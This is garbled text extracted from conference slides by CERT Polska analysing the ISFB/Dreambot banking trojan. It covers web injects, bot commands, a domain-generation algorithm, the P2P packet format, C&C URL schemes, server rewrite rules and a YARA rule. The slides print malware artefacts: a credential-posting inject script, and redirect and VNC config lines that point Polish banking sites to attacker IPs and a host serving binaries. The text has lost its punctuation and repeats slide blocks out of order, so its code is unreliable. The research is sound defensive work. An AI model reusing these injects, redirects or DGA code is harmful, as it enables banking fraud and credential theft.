SlavoPaul BlackKafeinePeter KrusePiotr KijewskiJarosław JedynakHorghFrank Ruiz
middotmiddotmiddotmiddotmiddotmiddotmiddotmiddot
5758
02122016 ISFB
httpslokalhostpltalksbotconf20161 5858
Q amp A
infocertpl wwwcertpl
CERTPolska CERTPolska
CERTPolska CERTPolska_en
mak makcertpl
02122016 ISFB
httpslokalhostpltalksbotconf20161 2758
Web Injectsvar bn = US_ + BOFA_1 var bot_id = ID_ + bn var sa = decode64() var req = send=0ampu_bot_id= + bot_id + ampbn= + bn+ amppage=8ampu_login=ampu_pass=amplog= + get_me_core sendScriptRequest(sa req function statusCall1() var element = documentgetElementById(loader) elementparentNoderemoveChild(element) ) )()
2758
02122016 ISFB
httpslokalhostpltalksbotconf20161 2858
Web Actions
FILESCREENSHOTHIDDENNEWGRABVIDEOPROCESSPOSTVNC
middotmiddotmiddotmiddotmiddotmiddotmiddotmiddot
2858
02122016 ISFB
httpslokalhostpltalksbotconf20161 2958
Web ActionsACTION REDIRECT ‐ Target myjs128js ‐gt http51016736dimyjs128_plv3js ACTION REDIRECT ‐ Target myjs28js ‐gt http51016736dimyjs28_plv3js ACTION REDIRECT ‐ Target ats8gatephp ‐gt http51016736azatsbmidgate128php ACTION REDIRECT ‐ Target httpswwwcentrum24pl ‐gt http51016736fkcen1php ACTION REDIRECT ‐ Target httpscompanynetmbankpl ‐gt http51016736fkmbiz1php ACTION FILE ‐ Target prv ACTION VNC ‐ Target httpswwwpekaobiznes24 | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpscompanynetmbankpl | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpsiri | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpskiri | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpsibiznes2 | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpsplhomebankin | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpshbfaces | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64bin
2958
02122016 ISFB
httpslokalhostpltalksbotconf20161 3058
The Bot
Registry Keys
02122016 ISFB
httpslokalhostpltalksbotconf20161 3158
Registry KeysSoftwareAppDataLowSoftwareMicrosoft [A‐F0‐9]8‐[A‐F0‐9]4‐[A‐F0‐9]4‐[A‐F0‐9]4‐[A‐F0‐9]12
InstallClientNetCfgLastTaskLastConfig
middotmiddotmiddotmiddotmiddot
3158
02122016 ISFB
httpslokalhostpltalksbotconf20161 3258
Other Acctions
GET_CERTSGET_COOKIESGET_SYSINFOLOAD_EXEGET_FILESSOCKS_STARTGET_KEYLOGGET_MAILGET_FTPVNC_STARTURL_BLOCK
middotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddot
3258
02122016 ISFB
httpslokalhostpltalksbotconf20161 3358
Calling Home
02122016 ISFB
httpslokalhostpltalksbotconf20161 3458
ET phone home
Static domains inside configuration filesDGA based on template and current dataCampC hidden in TOR networkP2P network
middotmiddotmiddotmiddot
3458
02122016 ISFB
httpslokalhostpltalksbotconf20161 3558
DGA rnd = LsaRandom() rndseed = (((kwargs[seed] ltlt 16)amp0xffffffff) + kwargs[season] + kwargs[lsa_seed]) amp 0xffffffff rndseed = (1 ltlt 16) + kwargs[season] ‐ 0x124676D0 r=[] for i in range(kwargs[count]) suf = kwargs[tld][(rndrnd gtgt 1) len(kwargs[tld])]rndchoose(kwargs[tld]) dom_l = rndrnd selfDGA_MIN_LEN + selfDGA_MIN_LEN wc = 0 dom = [] while wc lt dom_l d = rndchoose(words) ws = len(d) if not rndrnd 3 ws =2 if wc + ws gt selfDGA_MAX_LEN continue domappend(d[ws]) wc += ws rappend(join(dom) +suf)
PYTHON
3558
TOR
02122016 ISFB
httpslokalhostpltalksbotconf20161 3658
TOR
3658
02122016 ISFB
httpslokalhostpltalksbotconf20161 3758
P2P typedef struct DWORD magic 0x395f2ec1 DWORD my_secret DWORD his_secret BYTE cmd0 BYTE cmd1 BYTE data[] isfb_p2p_inner_packet typedef struct BYTE flags DWORD salt 4 random higher bytes of keys isfb_p2p_inner_packet p encrypted isfb_p2p_packet
C
3758
02122016 ISFB
httpslokalhostpltalksbotconf20161 3858
Internet is Hard
3858
02122016 ISFB
httpslokalhostpltalksbotconf20161 3958
URL formathttpssuser5fid=4uampversion5fid=luamppassphrase=sampsocks=luampversion=luampcrc=8x tfctqphpmkvf=KPgnjc3RohdH4zDttU9wItzEGB6cEz2jeDJWROI6FbIpqN9F6N3OOHUzISvptToYm+txOpUvU2YtY oxsxc=kcxsfxampversion=212356ampuser=aa16a132f1689c4d4b2eb59024d986c3ampserver=12ampid=1000ampcrc=1dc690f cnctldimages8Gmj7f1bp976veQbwY5XTyLFJl2QiH3b3X6ts7Yxd7nmkuXV6Yrt6mPUdSf2Ul jOBc27CVHf2WIxVsGgPv49qA_2B_2FdeXKWKVcPIuyXr4JBumUByAwRtPom91zP7FSaj2Ujpeg t[RAND][RAND]=data
3958
02122016 ISFB
httpslokalhostpltalksbotconf20161 4058
URL formatdecode_req = lambda d decrypt(ddecode(base64SKEY)) d=resub(_([0‐9A‐Fa‐f]2)lambda x chr(int(xgroup(1)16))d) try e=ddecode(base64) except Exception as e d=d+== pprintpprint(dict(map(lambda x xsplit(=) decode_req(d)strip(x00)split(amp))))
PYTHON
crc 7001380 id 1065ppc xi server 12 soft 1 user 0c0d784a0cf755970edbdf4c0cb27fca version 214887
4058
URL format
02122016 ISFB
httpslokalhostpltalksbotconf20161 4158
URL formattphp amp get new task amp Used until Sep 2015 cphp amp get new config amp Used until Sep 2015 dphp amp send stolen data amp Used until Sep 2015 imagesgif amp get new task amp current format imagesjpeg amp get new config amp current format imagesbmp amp send stolen data amp current format imagesavi amp download 2nd stage dll amp not every campc
4158
02122016 ISFB
httpslokalhostpltalksbotconf20161 4258
CampC respone
4258
02122016 ISFB
httpslokalhostpltalksbotconf20161 4358
CampC respone
4358
02122016 ISFB
httpslokalhostpltalksbotconf20161 4458
Wiki
Serpent is a symmetric key block cipher that was a finalistin the Advanced Encryption Standard (AES) contest whereit was ranked second to Rijndael Serpent was designed byRoss Anderson Eli Biham and Lars Knudsen
Like other AES submissions Serpent has a block size of128 bits and supports a key size of 128 192 or 256 bits[2]The cipher is a 32-round substitution-permutationnetwork operating on a block of four 32-bit words Eachround applies one of eight 4-bit to 4-bit S-boxes 32 timesin parallel Serpent was designed so that all operations canbe executed in parallel using 32 bit slices This maximizesparallelism but also allows use of the extensivecryptanalysis work performed on DES
4458
02122016 ISFB
httpslokalhostpltalksbotconf20161 4558
CampC respone
4558
02122016 ISFB
httpslokalhostpltalksbotconf20161 4658
Command and Control
02122016 ISFB
httpslokalhostpltalksbotconf20161 4758
IAPrewrite ^fileto()(bin) get128phpx=$1 break rewrite ^images()(bmp) dataphpx=$1$2 break rewrite ^images()(avi) loaderphpx=$1$2 break rewrite ^images()(gif) taskphpx=$1$2 break rewrite ^images()(jpeg) configphpx=$1$2 break
4758
02122016 ISFB
httpslokalhostpltalksbotconf20161 4858
IAP
4858
02122016 ISFB
httpslokalhostpltalksbotconf20161 4958
IAP
4958
02122016 ISFB
httpslokalhostpltalksbotconf20161 5058
DreambotRewriteEngine on RewriteRule ^c(+)php$ new_chandlerphp [LQSA] RewriteRule ^t(+)php$ new_thandlerphp [LQSA] RewriteRule ^d(+)php$ new_dhandlerphp [LQSA] RewriteRule ^images()(bmp) new_dhandlerphpq=$1$2 [LQSA] RewriteRule ^images()(gif) new_thandlerphpq=$1$2 [LQSA] RewriteRule ^images()(jpeg) new_chandlerphpq=$1$2 [LQSA]
5058
Dreambot
02122016 ISFB
httpslokalhostpltalksbotconf20161 5158
Dreambot
5158
02122016 ISFB
httpslokalhostpltalksbotconf20161 5258
Dreambot
5258
02122016 ISFB
httpslokalhostpltalksbotconf20161 5358
Dreambotrule isfb_dreambot banker meta author = mak module = isfb strings $str0 = vmware fullword $str1 = vbox fullword $str2 = virtual hd fullword $str4 = qemu fullword $str3 = c321txt fullword condition all of them and isfb_dropper
5358
02122016 ISFB
httpslokalhostpltalksbotconf20161 5458
The Endor not
02122016 ISFB
httpslokalhostpltalksbotconf20161 5558
Offsprings and Cousins
Common RootsPayloads
NymainPowersniff PunchyBagg
middotmiddot
BolekKBOT - based on goziRovnix - ISFB was ring3 payload protected by rovnixVawtrak - Nothing in common
middotmiddotmiddot
5558
Recap
02122016 ISFB
httpslokalhostpltalksbotconf20161 5658
Recap
One of the oldest bankers under active developmentInteresting solutionsVarious methods of infectionElaborate communication methods DGAP2PTOROld bugs die hard]Read paper for more details]Code soon available at makgithubrandom-stuffisfb
middotmiddotmiddotmiddotmiddotmiddotmiddot
5658
02122016 ISFB
httpslokalhostpltalksbotconf20161 5758
Kudospeople that knowingly (or not) halped us
SlavoPaul BlackKafeinePeter KrusePiotr KijewskiJarosław JedynakHorghFrank Ruiz
middotmiddotmiddotmiddotmiddotmiddotmiddotmiddot
5758
02122016 ISFB
httpslokalhostpltalksbotconf20161 5858
Q amp A
infocertpl wwwcertpl
CERTPolska CERTPolska
CERTPolska CERTPolska_en
mak makcertpl
02122016 ISFB
httpslokalhostpltalksbotconf20161 2858
Web Actions
FILESCREENSHOTHIDDENNEWGRABVIDEOPROCESSPOSTVNC
middotmiddotmiddotmiddotmiddotmiddotmiddotmiddot
2858
02122016 ISFB
httpslokalhostpltalksbotconf20161 2958
Web ActionsACTION REDIRECT ‐ Target myjs128js ‐gt http51016736dimyjs128_plv3js ACTION REDIRECT ‐ Target myjs28js ‐gt http51016736dimyjs28_plv3js ACTION REDIRECT ‐ Target ats8gatephp ‐gt http51016736azatsbmidgate128php ACTION REDIRECT ‐ Target httpswwwcentrum24pl ‐gt http51016736fkcen1php ACTION REDIRECT ‐ Target httpscompanynetmbankpl ‐gt http51016736fkmbiz1php ACTION FILE ‐ Target prv ACTION VNC ‐ Target httpswwwpekaobiznes24 | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpscompanynetmbankpl | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpsiri | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpskiri | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpsibiznes2 | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpsplhomebankin | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpshbfaces | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64bin
2958
02122016 ISFB
httpslokalhostpltalksbotconf20161 3058
The Bot
Registry Keys
02122016 ISFB
httpslokalhostpltalksbotconf20161 3158
Registry KeysSoftwareAppDataLowSoftwareMicrosoft [A‐F0‐9]8‐[A‐F0‐9]4‐[A‐F0‐9]4‐[A‐F0‐9]4‐[A‐F0‐9]12
InstallClientNetCfgLastTaskLastConfig
middotmiddotmiddotmiddotmiddot
3158
02122016 ISFB
httpslokalhostpltalksbotconf20161 3258
Other Acctions
GET_CERTSGET_COOKIESGET_SYSINFOLOAD_EXEGET_FILESSOCKS_STARTGET_KEYLOGGET_MAILGET_FTPVNC_STARTURL_BLOCK
middotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddot
3258
02122016 ISFB
httpslokalhostpltalksbotconf20161 3358
Calling Home
02122016 ISFB
httpslokalhostpltalksbotconf20161 3458
ET phone home
Static domains inside configuration filesDGA based on template and current dataCampC hidden in TOR networkP2P network
middotmiddotmiddotmiddot
3458
02122016 ISFB
httpslokalhostpltalksbotconf20161 3558
DGA rnd = LsaRandom() rndseed = (((kwargs[seed] ltlt 16)amp0xffffffff) + kwargs[season] + kwargs[lsa_seed]) amp 0xffffffff rndseed = (1 ltlt 16) + kwargs[season] ‐ 0x124676D0 r=[] for i in range(kwargs[count]) suf = kwargs[tld][(rndrnd gtgt 1) len(kwargs[tld])]rndchoose(kwargs[tld]) dom_l = rndrnd selfDGA_MIN_LEN + selfDGA_MIN_LEN wc = 0 dom = [] while wc lt dom_l d = rndchoose(words) ws = len(d) if not rndrnd 3 ws =2 if wc + ws gt selfDGA_MAX_LEN continue domappend(d[ws]) wc += ws rappend(join(dom) +suf)
PYTHON
3558
TOR
02122016 ISFB
httpslokalhostpltalksbotconf20161 3658
TOR
3658
02122016 ISFB
httpslokalhostpltalksbotconf20161 3758
P2P typedef struct DWORD magic 0x395f2ec1 DWORD my_secret DWORD his_secret BYTE cmd0 BYTE cmd1 BYTE data[] isfb_p2p_inner_packet typedef struct BYTE flags DWORD salt 4 random higher bytes of keys isfb_p2p_inner_packet p encrypted isfb_p2p_packet
C
3758
02122016 ISFB
httpslokalhostpltalksbotconf20161 3858
Internet is Hard
3858
02122016 ISFB
httpslokalhostpltalksbotconf20161 3958
URL formathttpssuser5fid=4uampversion5fid=luamppassphrase=sampsocks=luampversion=luampcrc=8x tfctqphpmkvf=KPgnjc3RohdH4zDttU9wItzEGB6cEz2jeDJWROI6FbIpqN9F6N3OOHUzISvptToYm+txOpUvU2YtY oxsxc=kcxsfxampversion=212356ampuser=aa16a132f1689c4d4b2eb59024d986c3ampserver=12ampid=1000ampcrc=1dc690f cnctldimages8Gmj7f1bp976veQbwY5XTyLFJl2QiH3b3X6ts7Yxd7nmkuXV6Yrt6mPUdSf2Ul jOBc27CVHf2WIxVsGgPv49qA_2B_2FdeXKWKVcPIuyXr4JBumUByAwRtPom91zP7FSaj2Ujpeg t[RAND][RAND]=data
3958
02122016 ISFB
httpslokalhostpltalksbotconf20161 4058
URL formatdecode_req = lambda d decrypt(ddecode(base64SKEY)) d=resub(_([0‐9A‐Fa‐f]2)lambda x chr(int(xgroup(1)16))d) try e=ddecode(base64) except Exception as e d=d+== pprintpprint(dict(map(lambda x xsplit(=) decode_req(d)strip(x00)split(amp))))
PYTHON
crc 7001380 id 1065ppc xi server 12 soft 1 user 0c0d784a0cf755970edbdf4c0cb27fca version 214887
4058
URL format
02122016 ISFB
httpslokalhostpltalksbotconf20161 4158
URL formattphp amp get new task amp Used until Sep 2015 cphp amp get new config amp Used until Sep 2015 dphp amp send stolen data amp Used until Sep 2015 imagesgif amp get new task amp current format imagesjpeg amp get new config amp current format imagesbmp amp send stolen data amp current format imagesavi amp download 2nd stage dll amp not every campc
4158
02122016 ISFB
httpslokalhostpltalksbotconf20161 4258
CampC respone
4258
02122016 ISFB
httpslokalhostpltalksbotconf20161 4358
CampC respone
4358
02122016 ISFB
httpslokalhostpltalksbotconf20161 4458
Wiki
Serpent is a symmetric key block cipher that was a finalistin the Advanced Encryption Standard (AES) contest whereit was ranked second to Rijndael Serpent was designed byRoss Anderson Eli Biham and Lars Knudsen
Like other AES submissions Serpent has a block size of128 bits and supports a key size of 128 192 or 256 bits[2]The cipher is a 32-round substitution-permutationnetwork operating on a block of four 32-bit words Eachround applies one of eight 4-bit to 4-bit S-boxes 32 timesin parallel Serpent was designed so that all operations canbe executed in parallel using 32 bit slices This maximizesparallelism but also allows use of the extensivecryptanalysis work performed on DES
4458
02122016 ISFB
httpslokalhostpltalksbotconf20161 4558
CampC respone
4558
02122016 ISFB
httpslokalhostpltalksbotconf20161 4658
Command and Control
02122016 ISFB
httpslokalhostpltalksbotconf20161 4758
IAPrewrite ^fileto()(bin) get128phpx=$1 break rewrite ^images()(bmp) dataphpx=$1$2 break rewrite ^images()(avi) loaderphpx=$1$2 break rewrite ^images()(gif) taskphpx=$1$2 break rewrite ^images()(jpeg) configphpx=$1$2 break
4758
02122016 ISFB
httpslokalhostpltalksbotconf20161 4858
IAP
4858
02122016 ISFB
httpslokalhostpltalksbotconf20161 4958
IAP
4958
02122016 ISFB
httpslokalhostpltalksbotconf20161 5058
DreambotRewriteEngine on RewriteRule ^c(+)php$ new_chandlerphp [LQSA] RewriteRule ^t(+)php$ new_thandlerphp [LQSA] RewriteRule ^d(+)php$ new_dhandlerphp [LQSA] RewriteRule ^images()(bmp) new_dhandlerphpq=$1$2 [LQSA] RewriteRule ^images()(gif) new_thandlerphpq=$1$2 [LQSA] RewriteRule ^images()(jpeg) new_chandlerphpq=$1$2 [LQSA]
5058
Dreambot
02122016 ISFB
httpslokalhostpltalksbotconf20161 5158
Dreambot
5158
02122016 ISFB
httpslokalhostpltalksbotconf20161 5258
Dreambot
5258
02122016 ISFB
httpslokalhostpltalksbotconf20161 5358
Dreambotrule isfb_dreambot banker meta author = mak module = isfb strings $str0 = vmware fullword $str1 = vbox fullword $str2 = virtual hd fullword $str4 = qemu fullword $str3 = c321txt fullword condition all of them and isfb_dropper
5358
02122016 ISFB
httpslokalhostpltalksbotconf20161 5458
The Endor not
02122016 ISFB
httpslokalhostpltalksbotconf20161 5558
Offsprings and Cousins
Common RootsPayloads
NymainPowersniff PunchyBagg
middotmiddot
BolekKBOT - based on goziRovnix - ISFB was ring3 payload protected by rovnixVawtrak - Nothing in common
middotmiddotmiddot
5558
Recap
02122016 ISFB
httpslokalhostpltalksbotconf20161 5658
Recap
One of the oldest bankers under active developmentInteresting solutionsVarious methods of infectionElaborate communication methods DGAP2PTOROld bugs die hard]Read paper for more details]Code soon available at makgithubrandom-stuffisfb
middotmiddotmiddotmiddotmiddotmiddotmiddot
5658
02122016 ISFB
httpslokalhostpltalksbotconf20161 5758
Kudospeople that knowingly (or not) halped us
SlavoPaul BlackKafeinePeter KrusePiotr KijewskiJarosław JedynakHorghFrank Ruiz
middotmiddotmiddotmiddotmiddotmiddotmiddotmiddot
5758
02122016 ISFB
httpslokalhostpltalksbotconf20161 5858
Q amp A
infocertpl wwwcertpl
CERTPolska CERTPolska
CERTPolska CERTPolska_en
mak makcertpl
02122016 ISFB
httpslokalhostpltalksbotconf20161 2958
Web ActionsACTION REDIRECT ‐ Target myjs128js ‐gt http51016736dimyjs128_plv3js ACTION REDIRECT ‐ Target myjs28js ‐gt http51016736dimyjs28_plv3js ACTION REDIRECT ‐ Target ats8gatephp ‐gt http51016736azatsbmidgate128php ACTION REDIRECT ‐ Target httpswwwcentrum24pl ‐gt http51016736fkcen1php ACTION REDIRECT ‐ Target httpscompanynetmbankpl ‐gt http51016736fkmbiz1php ACTION FILE ‐ Target prv ACTION VNC ‐ Target httpswwwpekaobiznes24 | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpscompanynetmbankpl | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpsiri | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpskiri | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpsibiznes2 | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpsplhomebankin | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpshbfaces | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64bin
2958
02122016 ISFB
httpslokalhostpltalksbotconf20161 3058
The Bot
Registry Keys
02122016 ISFB
httpslokalhostpltalksbotconf20161 3158
Registry KeysSoftwareAppDataLowSoftwareMicrosoft [A‐F0‐9]8‐[A‐F0‐9]4‐[A‐F0‐9]4‐[A‐F0‐9]4‐[A‐F0‐9]12
InstallClientNetCfgLastTaskLastConfig
middotmiddotmiddotmiddotmiddot
3158
02122016 ISFB
httpslokalhostpltalksbotconf20161 3258
Other Acctions
GET_CERTSGET_COOKIESGET_SYSINFOLOAD_EXEGET_FILESSOCKS_STARTGET_KEYLOGGET_MAILGET_FTPVNC_STARTURL_BLOCK
middotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddot
3258
02122016 ISFB
httpslokalhostpltalksbotconf20161 3358
Calling Home
02122016 ISFB
httpslokalhostpltalksbotconf20161 3458
ET phone home
Static domains inside configuration filesDGA based on template and current dataCampC hidden in TOR networkP2P network
middotmiddotmiddotmiddot
3458
02122016 ISFB
httpslokalhostpltalksbotconf20161 3558
DGA rnd = LsaRandom() rndseed = (((kwargs[seed] ltlt 16)amp0xffffffff) + kwargs[season] + kwargs[lsa_seed]) amp 0xffffffff rndseed = (1 ltlt 16) + kwargs[season] ‐ 0x124676D0 r=[] for i in range(kwargs[count]) suf = kwargs[tld][(rndrnd gtgt 1) len(kwargs[tld])]rndchoose(kwargs[tld]) dom_l = rndrnd selfDGA_MIN_LEN + selfDGA_MIN_LEN wc = 0 dom = [] while wc lt dom_l d = rndchoose(words) ws = len(d) if not rndrnd 3 ws =2 if wc + ws gt selfDGA_MAX_LEN continue domappend(d[ws]) wc += ws rappend(join(dom) +suf)
PYTHON
3558
TOR
02122016 ISFB
httpslokalhostpltalksbotconf20161 3658
TOR
3658
02122016 ISFB
httpslokalhostpltalksbotconf20161 3758
P2P typedef struct DWORD magic 0x395f2ec1 DWORD my_secret DWORD his_secret BYTE cmd0 BYTE cmd1 BYTE data[] isfb_p2p_inner_packet typedef struct BYTE flags DWORD salt 4 random higher bytes of keys isfb_p2p_inner_packet p encrypted isfb_p2p_packet
C
3758
02122016 ISFB
httpslokalhostpltalksbotconf20161 3858
Internet is Hard
3858
02122016 ISFB
httpslokalhostpltalksbotconf20161 3958
URL formathttpssuser5fid=4uampversion5fid=luamppassphrase=sampsocks=luampversion=luampcrc=8x tfctqphpmkvf=KPgnjc3RohdH4zDttU9wItzEGB6cEz2jeDJWROI6FbIpqN9F6N3OOHUzISvptToYm+txOpUvU2YtY oxsxc=kcxsfxampversion=212356ampuser=aa16a132f1689c4d4b2eb59024d986c3ampserver=12ampid=1000ampcrc=1dc690f cnctldimages8Gmj7f1bp976veQbwY5XTyLFJl2QiH3b3X6ts7Yxd7nmkuXV6Yrt6mPUdSf2Ul jOBc27CVHf2WIxVsGgPv49qA_2B_2FdeXKWKVcPIuyXr4JBumUByAwRtPom91zP7FSaj2Ujpeg t[RAND][RAND]=data
3958
02122016 ISFB
httpslokalhostpltalksbotconf20161 4058
URL formatdecode_req = lambda d decrypt(ddecode(base64SKEY)) d=resub(_([0‐9A‐Fa‐f]2)lambda x chr(int(xgroup(1)16))d) try e=ddecode(base64) except Exception as e d=d+== pprintpprint(dict(map(lambda x xsplit(=) decode_req(d)strip(x00)split(amp))))
PYTHON
crc 7001380 id 1065ppc xi server 12 soft 1 user 0c0d784a0cf755970edbdf4c0cb27fca version 214887
4058
URL format
02122016 ISFB
httpslokalhostpltalksbotconf20161 4158
URL formattphp amp get new task amp Used until Sep 2015 cphp amp get new config amp Used until Sep 2015 dphp amp send stolen data amp Used until Sep 2015 imagesgif amp get new task amp current format imagesjpeg amp get new config amp current format imagesbmp amp send stolen data amp current format imagesavi amp download 2nd stage dll amp not every campc
4158
02122016 ISFB
httpslokalhostpltalksbotconf20161 4258
CampC respone
4258
02122016 ISFB
httpslokalhostpltalksbotconf20161 4358
CampC respone
4358
02122016 ISFB
httpslokalhostpltalksbotconf20161 4458
Wiki
Serpent is a symmetric key block cipher that was a finalistin the Advanced Encryption Standard (AES) contest whereit was ranked second to Rijndael Serpent was designed byRoss Anderson Eli Biham and Lars Knudsen
Like other AES submissions Serpent has a block size of128 bits and supports a key size of 128 192 or 256 bits[2]The cipher is a 32-round substitution-permutationnetwork operating on a block of four 32-bit words Eachround applies one of eight 4-bit to 4-bit S-boxes 32 timesin parallel Serpent was designed so that all operations canbe executed in parallel using 32 bit slices This maximizesparallelism but also allows use of the extensivecryptanalysis work performed on DES
4458
02122016 ISFB
httpslokalhostpltalksbotconf20161 4558
CampC respone
4558
02122016 ISFB
httpslokalhostpltalksbotconf20161 4658
Command and Control
02122016 ISFB
httpslokalhostpltalksbotconf20161 4758
IAPrewrite ^fileto()(bin) get128phpx=$1 break rewrite ^images()(bmp) dataphpx=$1$2 break rewrite ^images()(avi) loaderphpx=$1$2 break rewrite ^images()(gif) taskphpx=$1$2 break rewrite ^images()(jpeg) configphpx=$1$2 break
4758
02122016 ISFB
httpslokalhostpltalksbotconf20161 4858
IAP
4858
02122016 ISFB
httpslokalhostpltalksbotconf20161 4958
IAP
4958
02122016 ISFB
httpslokalhostpltalksbotconf20161 5058
DreambotRewriteEngine on RewriteRule ^c(+)php$ new_chandlerphp [LQSA] RewriteRule ^t(+)php$ new_thandlerphp [LQSA] RewriteRule ^d(+)php$ new_dhandlerphp [LQSA] RewriteRule ^images()(bmp) new_dhandlerphpq=$1$2 [LQSA] RewriteRule ^images()(gif) new_thandlerphpq=$1$2 [LQSA] RewriteRule ^images()(jpeg) new_chandlerphpq=$1$2 [LQSA]
5058
Dreambot
02122016 ISFB
httpslokalhostpltalksbotconf20161 5158
Dreambot
5158
02122016 ISFB
httpslokalhostpltalksbotconf20161 5258
Dreambot
5258
02122016 ISFB
httpslokalhostpltalksbotconf20161 5358
Dreambotrule isfb_dreambot banker meta author = mak module = isfb strings $str0 = vmware fullword $str1 = vbox fullword $str2 = virtual hd fullword $str4 = qemu fullword $str3 = c321txt fullword condition all of them and isfb_dropper
5358
02122016 ISFB
httpslokalhostpltalksbotconf20161 5458
The Endor not
02122016 ISFB
httpslokalhostpltalksbotconf20161 5558
Offsprings and Cousins
Common RootsPayloads
NymainPowersniff PunchyBagg
middotmiddot
BolekKBOT - based on goziRovnix - ISFB was ring3 payload protected by rovnixVawtrak - Nothing in common
middotmiddotmiddot
5558
Recap
02122016 ISFB
httpslokalhostpltalksbotconf20161 5658
Recap
One of the oldest bankers under active developmentInteresting solutionsVarious methods of infectionElaborate communication methods DGAP2PTOROld bugs die hard]Read paper for more details]Code soon available at makgithubrandom-stuffisfb
middotmiddotmiddotmiddotmiddotmiddotmiddot
5658
02122016 ISFB
httpslokalhostpltalksbotconf20161 5758
Kudospeople that knowingly (or not) halped us
SlavoPaul BlackKafeinePeter KrusePiotr KijewskiJarosław JedynakHorghFrank Ruiz
middotmiddotmiddotmiddotmiddotmiddotmiddotmiddot
5758
02122016 ISFB
httpslokalhostpltalksbotconf20161 5858
Q amp A
infocertpl wwwcertpl
CERTPolska CERTPolska
CERTPolska CERTPolska_en
mak makcertpl
02122016 ISFB
httpslokalhostpltalksbotconf20161 3058
The Bot
Registry Keys
02122016 ISFB
httpslokalhostpltalksbotconf20161 3158
Registry KeysSoftwareAppDataLowSoftwareMicrosoft [A‐F0‐9]8‐[A‐F0‐9]4‐[A‐F0‐9]4‐[A‐F0‐9]4‐[A‐F0‐9]12
InstallClientNetCfgLastTaskLastConfig
middotmiddotmiddotmiddotmiddot
3158
02122016 ISFB
httpslokalhostpltalksbotconf20161 3258
Other Acctions
GET_CERTSGET_COOKIESGET_SYSINFOLOAD_EXEGET_FILESSOCKS_STARTGET_KEYLOGGET_MAILGET_FTPVNC_STARTURL_BLOCK
middotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddot
3258
02122016 ISFB
httpslokalhostpltalksbotconf20161 3358
Calling Home
02122016 ISFB
httpslokalhostpltalksbotconf20161 3458
ET phone home
Static domains inside configuration filesDGA based on template and current dataCampC hidden in TOR networkP2P network
middotmiddotmiddotmiddot
3458
02122016 ISFB
httpslokalhostpltalksbotconf20161 3558
DGA rnd = LsaRandom() rndseed = (((kwargs[seed] ltlt 16)amp0xffffffff) + kwargs[season] + kwargs[lsa_seed]) amp 0xffffffff rndseed = (1 ltlt 16) + kwargs[season] ‐ 0x124676D0 r=[] for i in range(kwargs[count]) suf = kwargs[tld][(rndrnd gtgt 1) len(kwargs[tld])]rndchoose(kwargs[tld]) dom_l = rndrnd selfDGA_MIN_LEN + selfDGA_MIN_LEN wc = 0 dom = [] while wc lt dom_l d = rndchoose(words) ws = len(d) if not rndrnd 3 ws =2 if wc + ws gt selfDGA_MAX_LEN continue domappend(d[ws]) wc += ws rappend(join(dom) +suf)
PYTHON
3558
TOR
02122016 ISFB
httpslokalhostpltalksbotconf20161 3658
TOR
3658
02122016 ISFB
httpslokalhostpltalksbotconf20161 3758
P2P typedef struct DWORD magic 0x395f2ec1 DWORD my_secret DWORD his_secret BYTE cmd0 BYTE cmd1 BYTE data[] isfb_p2p_inner_packet typedef struct BYTE flags DWORD salt 4 random higher bytes of keys isfb_p2p_inner_packet p encrypted isfb_p2p_packet
C
3758
02122016 ISFB
httpslokalhostpltalksbotconf20161 3858
Internet is Hard
3858
02122016 ISFB
httpslokalhostpltalksbotconf20161 3958
URL formathttpssuser5fid=4uampversion5fid=luamppassphrase=sampsocks=luampversion=luampcrc=8x tfctqphpmkvf=KPgnjc3RohdH4zDttU9wItzEGB6cEz2jeDJWROI6FbIpqN9F6N3OOHUzISvptToYm+txOpUvU2YtY oxsxc=kcxsfxampversion=212356ampuser=aa16a132f1689c4d4b2eb59024d986c3ampserver=12ampid=1000ampcrc=1dc690f cnctldimages8Gmj7f1bp976veQbwY5XTyLFJl2QiH3b3X6ts7Yxd7nmkuXV6Yrt6mPUdSf2Ul jOBc27CVHf2WIxVsGgPv49qA_2B_2FdeXKWKVcPIuyXr4JBumUByAwRtPom91zP7FSaj2Ujpeg t[RAND][RAND]=data
3958
02122016 ISFB
httpslokalhostpltalksbotconf20161 4058
URL formatdecode_req = lambda d decrypt(ddecode(base64SKEY)) d=resub(_([0‐9A‐Fa‐f]2)lambda x chr(int(xgroup(1)16))d) try e=ddecode(base64) except Exception as e d=d+== pprintpprint(dict(map(lambda x xsplit(=) decode_req(d)strip(x00)split(amp))))
PYTHON
crc 7001380 id 1065ppc xi server 12 soft 1 user 0c0d784a0cf755970edbdf4c0cb27fca version 214887
4058
URL format
02122016 ISFB
httpslokalhostpltalksbotconf20161 4158
